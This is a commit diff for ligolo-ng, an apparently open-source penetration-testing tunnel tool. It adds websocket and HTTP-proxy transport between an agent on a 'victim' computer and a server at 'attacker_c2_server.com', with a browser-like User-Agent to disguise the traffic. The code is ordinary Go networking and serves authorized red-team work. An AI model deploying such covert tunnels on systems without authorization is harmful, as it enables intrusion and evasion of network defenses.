Add websocket protocol with http-proxy support

Author: virusvfv

README.md

@@ -132,6 +132,11 @@ $ ./proxy -h # Help options
 $ ./proxy -autocert # Automatically request LetsEncrypt certificates
 $ ./proxy -selfcert # Use self-signed certificates
 ```
+For using websocket protocol start the *proxy* server with `https://` prefix
+```shell
+$ ./proxy -selfcert https://0.0.0.0:8443 # Use self-signed certificates
+```
+
 
 ### TLS Options
 
@@ -182,7 +187,16 @@ Start the *agent* on your target (victim) computer (no privileges are required!)
 $ ./agent -connect attacker_c2_server.com:11601
 ```
 
-> If you want to tunnel the connection over a SOCKS5 proxy, you can use the `--socks ip:port` option. You can specify SOCKS credentials using the `--socks-user` and `--socks-pass` arguments.
+You can use websocket connection to ligolo-ng proxy by adding https:// prefix (by default 443 port will be used):
+```shell
+$ ./agent -connect https://attacker_c2_server.com
+$ ./agent -connect https://attacker_c2_server.com:8443
+```
+
+> If you want to tunnel the connection over a SOCKS5/HTTP proxy, you can use the `--proxy schema://username:password@ip:port` option. 
+> Examples: `--proxy http://127.0.0.1:8080`, `--proxy http://admin:[email protected]:8080`, `--proxy socks5://admin:[email protected]:1080`
+> 
+> HTTP proxy can be used only with websocket protocol.
 
 A session should appear on the *proxy* server.
 

cmd/agent/main.go

@@ -2,6 +2,7 @@ package main
 
 import (
 	"bytes"
+	"context"
 	"crypto/sha256"
 	"crypto/tls"
 	"crypto/x509"
@@ -14,7 +15,11 @@ import (
 	"github.com/sirupsen/logrus"
 	goproxy "golang.org/x/net/proxy"
 	"net"
+	"net/http"
+	"net/url"
+	"nhooyr.io/websocket"
 	"os"
+	"strings"
 	"time"
 )
 
@@ -30,11 +35,12 @@ func main() {
 	var acceptFingerprint = flag.String("accept-fingerprint", "", "accept certificates matching the following SHA256 fingerprint (hex format)")
 	var verbose = flag.Bool("v", false, "enable verbose mode")
 	var retry = flag.Bool("retry", false, "auto-retry on error")
-	var socksProxy = flag.String("socks", "", "socks5 proxy address (ip:port)")
-	var socksUser = flag.String("socks-user", "", "socks5 username")
-	var socksPass = flag.String("socks-pass", "", "socks5 password")
+	var socksProxy = flag.String("proxy", "", "proxy URL address (http://admin:[email protected]:8080)"+
+		" or socks://admin:[email protected]:8080")
 	var serverAddr = flag.String("connect", "", "connect to proxy (domain:port)")
 	var bindAddr = flag.String("bind", "", "bind to ip:port")
+	var userAgent = flag.String("ua", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "+
+		"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "HTTP User-Agent")
 	var versionFlag = flag.Bool("version", false, "show the current version")
 
 	flag.Usage = func() {
@@ -91,11 +97,24 @@ func main() {
 	if *serverAddr == "" {
 		logrus.Fatal("please, specify the target host user -connect host:port")
 	}
-	host, _, err := net.SplitHostPort(*serverAddr)
-	if err != nil {
-		logrus.Fatal("invalid connect address, please use host:port")
+
+	if strings.Contains(*serverAddr, "https://") {
+		//websocket https connection
+		host, _, err := net.SplitHostPort(strings.Replace(*serverAddr, "https://", "", 1))
+		if err != nil {
+			logrus.Info("There is no port in address string, assuming that port is 443")
+			host = strings.Replace(*serverAddr, "https://", "", 1)
+		}
+		tlsConfig.ServerName = host
+	} else {
+		//direct connection
+		host, _, err := net.SplitHostPort(*serverAddr)
+		if err != nil {
+			logrus.Fatal("Invalid connect address, please use host:port")
+		}
+		tlsConfig.ServerName = host
 	}
-	tlsConfig.ServerName = host
+
 	if *ignoreCertificate {
 		logrus.Warn("warning, certificate validation disabled")
 		tlsConfig.InsecureSkipVerify = true
@@ -105,33 +124,53 @@ func main() {
 
 	for {
 		var err error
-		if *socksProxy != "" {
-			if _, _, err := net.SplitHostPort(*socksProxy); err != nil {
-				logrus.Fatal("invalid socks5 address, please use host:port")
-			}
-			conn, err = sockDial(*serverAddr, *socksProxy, *socksUser, *socksPass)
+		if strings.Contains(*serverAddr, "https://") ||
+			strings.Contains(*serverAddr, "wss://") {
+			*serverAddr = strings.Replace(*serverAddr, "https://", "wss://", 1)
+			//websocket
+			err = wsconnect(&tlsConfig, *serverAddr, *socksProxy, *userAgent)
 		} else {
-			conn, err = net.Dial("tcp", *serverAddr)
-		}
-		if err == nil {
-			if *acceptFingerprint != "" {
-				tlsConfig.InsecureSkipVerify = true
-				tlsConfig.VerifyPeerCertificate = func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
-					crtFingerprint := sha256.Sum256(rawCerts[0])
-					crtMatch, err := hex.DecodeString(*acceptFingerprint)
+			if *socksProxy != "" {
+				if strings.Contains(*socksProxy, "http://") {
+					//TODO: http proxy CONNECT with direct ligolo protocol
+				} else {
+					//suppose that scheme is socks:// or socks5://
+					var proxyUrl *url.URL
+					proxyUrl, err = url.Parse(*socksProxy)
 					if err != nil {
-						return fmt.Errorf("invalid cert fingerprint: %v\n", err)
+						logrus.Fatal("invalid socks5 address, please use host:port")
 					}
-					if bytes.Compare(crtMatch, crtFingerprint[:]) != 0 {
-						return fmt.Errorf("certificate does not match fingerprint: %X != %X", crtFingerprint, crtMatch)
+					if _, _, err = net.SplitHostPort(proxyUrl.Host); err != nil {
+						logrus.Fatal("invalid socks5 address, please use socks://host:port")
 					}
-					return nil
+					pass, _ := proxyUrl.User.Password()
+					conn, err = sockDial(*serverAddr, proxyUrl.Host, proxyUrl.User.Username(), pass)
 				}
+
+			} else {
+				conn, err = net.Dial("tcp", *serverAddr)
 			}
-			tlsConn := tls.Client(conn, &tlsConfig)
+			if err == nil {
+				if *acceptFingerprint != "" {
+					tlsConfig.InsecureSkipVerify = true
+					tlsConfig.VerifyPeerCertificate = func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
+						crtFingerprint := sha256.Sum256(rawCerts[0])
+						crtMatch, err := hex.DecodeString(*acceptFingerprint)
+						if err != nil {
+							return fmt.Errorf("invalid cert fingerprint: %v\n", err)
+						}
+						if bytes.Compare(crtMatch, crtFingerprint[:]) != 0 {
+							return fmt.Errorf("certificate does not match fingerprint: %X != %X", crtFingerprint, crtMatch)
+						}
+						return nil
+					}
+				}
+				tlsConn := tls.Client(conn, &tlsConfig)
 
-			err = connect(tlsConn)
+				err = connect(tlsConn)
+			}
 		}
+
 		logrus.Errorf("Connection error: %v", err)
 		if *retry {
 			logrus.Info("Retrying in 5 seconds.")
@@ -169,3 +208,57 @@ func connect(conn net.Conn) error {
 		go agent.HandleConn(conn)
 	}
 }
+
+func wsconnect(config *tls.Config, wsaddr string, proxystr string, useragent string) error {
+
+	//timeout for websocket library connection - 20 seconds
+	//TODO: add timeout as cmd parameter
+	ctx, cancel := context.WithTimeout(context.Background(), time.Second*20)
+	defer cancel()
+
+	//in case of websocket proxy can be http with login:pass
+	//Ex: proxystr = "http://admin:[email protected]:8080"
+	proxyUrl, err := url.Parse(proxystr)
+	if err != nil || proxystr == "" {
+		proxyUrl = nil
+	}
+
+	httpTransport := &http.Transport{}
+	config.MinVersion = tls.VersionTLS10
+
+	httpTransport = &http.Transport{
+		MaxIdleConns:    http.DefaultMaxIdleConnsPerHost,
+		TLSClientConfig: config,
+		Proxy:           http.ProxyURL(proxyUrl),
+	}
+
+	httpClient := &http.Client{Transport: httpTransport}
+	httpheader := &http.Header{}
+	httpheader.Add("User-Agent", useragent)
+	//Add your additional headers here
+	//httpheader.Add("X-Blablabla", "Blublublu")
+	//TODO: set -H cmd param (as ffuf, wfuzz)
+
+	wsConn, _, err := websocket.Dial(ctx, wsaddr, &websocket.DialOptions{HTTPClient: httpClient, HTTPHeader: *httpheader})
+	if err != nil {
+		return err
+	}
+
+	//timeout for netconn derived from websocket connection - it must be very big
+	netctx, cancel := context.WithTimeout(context.Background(), time.Hour*999999)
+	netConn := websocket.NetConn(netctx, wsConn, websocket.MessageBinary)
+	defer cancel()
+	yamuxConn, err := yamux.Server(netConn, yamux.DefaultConfig())
+	if err != nil {
+		return err
+	}
+
+	logrus.Info("Websocket connection established")
+	for {
+		conn, err := yamuxConn.Accept()
+		if err != nil {
+			return err
+		}
+		go agent.HandleConn(conn)
+	}
+}

go.mod

@@ -19,6 +19,7 @@ require (
 	github.com/nicocha30/gvisor-ligolo v0.0.0-20230726075806-989fa2c0a413
 	github.com/vishvananda/netlink v1.1.1-0.20211118161826-650dca95af54
 	golang.org/x/sys v0.21.0
+	nhooyr.io/websocket v1.8.11
 )
 
 require (

go.sum

@@ -145,3 +145,5 @@ gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8
 gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
 gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
 gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+nhooyr.io/websocket v1.8.11 h1:f/qXNc2/3DpoSZkHt1DQu6rj4zGC8JmkkLkWss0MgN0=
+nhooyr.io/websocket v1.8.11/go.mod h1:rN9OFWIUwuxg4fR5tELlYC04bXYowCP9GX47ivo2l+c=

pkg/controller/controller.go

@@ -1,6 +1,7 @@
 package controller
 
 import (
+	"context"
 	"crypto/sha256"
 	"crypto/tls"
 	"errors"
@@ -9,6 +10,9 @@ import (
 	"golang.org/x/crypto/acme/autocert"
 	"net"
 	"net/http"
+	"nhooyr.io/websocket"
+	"strings"
+	"time"
 )
 
 type Controller struct {
@@ -30,10 +34,29 @@ type ControllerConfig struct {
 	DomainWhitelist []string
 }
 
+var wsconn net.Conn
+
 func New(config ControllerConfig) Controller {
 	return Controller{Network: "tcp", Connection: make(chan net.Conn, 1024), ControllerConfig: config, startchan: make(chan error), SelfCertCache: "ligolo-selfcerts"}
 }
 
+type myHttpServer struct {
+	// logf controls where logs are sent.
+	logf func(f string, v ...interface{})
+}
+
+func (s myHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+
+	c, err := websocket.Accept(w, r, nil)
+	if err != nil {
+		logrus.Error(err)
+		return
+	}
+	netctx, _ := context.WithTimeout(context.Background(), time.Hour*999999)
+	wsconn = websocket.NetConn(netctx, c, websocket.MessageBinary)
+	return
+}
+
 func (c *Controller) WaitForReady() error {
 	return <-c.startchan
 }
@@ -91,20 +114,57 @@ func (c *Controller) ListenAndServe() {
 		return
 	}
 
-	listener, err := tls.Listen(c.Network, c.Address, &tlsConfig)
-	if err != nil {
-		c.startchan <- err
-		return
-	}
-	defer listener.Close()
-	c.startchan <- nil // Controller is listening.
-	logrus.Infof("Listening on %s", c.Address)
-	for {
-		conn, err := listener.Accept()
+	if strings.Contains(c.Address, "https://") {
+		//SSL websocket protocol
+		listener, err := tls.Listen(c.Network, strings.Replace(c.Address, "https://", "", 1), &tlsConfig)
 		if err != nil {
-			logrus.Error(err)
-			continue
+			logrus.Fatal(err)
+		}
+		defer listener.Close()
+		close(c.startchan) // Controller is listening.
+		logrus.Infof("Listening websocket on %s", c.Address)
+
+		s := &http.Server{
+			Handler: myHttpServer{},
+		}
+		for {
+			//start http handler in go routine
+			go func() {
+				err = s.Serve(listener)
+			}()
+			if err != nil {
+				logrus.Error(err)
+			}
+			//manual waiting until handler got connection and global variable wsconn is set by http handler
+			//this not so gracefully but effective ))
+			for {
+				if wsconn != nil {
+					logrus.Infof("Got websocket connection %s", wsconn.RemoteAddr())
+					c.Connection <- wsconn
+					wsconn = nil
+					break
+				}
+				//add some sleep to reduce CPU usage, because it is in loop
+				time.Sleep(time.Millisecond * 500)
+			}
+		}
+	} else {
+		//direct listen with legacy ligolo-ng protocol
+		listener, err := tls.Listen(c.Network, c.Address, &tlsConfig)
+		if err != nil {
+			c.startchan <- err
+			return
+		}
+		defer listener.Close()
+		c.startchan <- nil // Controller is listening.
+		logrus.Infof("Listening on %s", c.Address)
+		for {
+			conn, err := listener.Accept()
+			if err != nil {
+				logrus.Error(err)
+				continue
+			}
+			c.Connection <- conn
 		}
-		c.Connection <- conn
 	}
 }